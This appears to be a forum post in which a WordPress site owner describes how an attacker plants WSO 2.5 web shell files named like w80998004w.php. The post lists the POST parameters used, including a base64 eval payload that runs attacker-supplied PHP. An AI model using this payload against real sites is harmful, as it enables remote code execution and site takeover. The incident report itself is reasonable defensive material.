the hacker can create a file in wordpress directory or in wp-admin directory. the filename is always wnnnnnnnnw.php where n is a number, for exemple : w80998004w.php
this file contain the wso shel 2.5.
Finally a find how the hacker can create this file.
He send a post command to the webserver :
(you can find all parameters here : http://pastebin.com/FtSLxHQQ )
[a] => Php
[ajax] => true
[p1] => eval(base64_decode(str_replace(chr(32),chr(43),$_POST[chr(99)])));
[c] => TOO BIG TO PUT HERRE
[showimg] => ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYyddKSk7
[w] => ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYyddKSk7
Ok, if the permissions are correctly set, the file can't be created.
But I think there is a bug somewhere.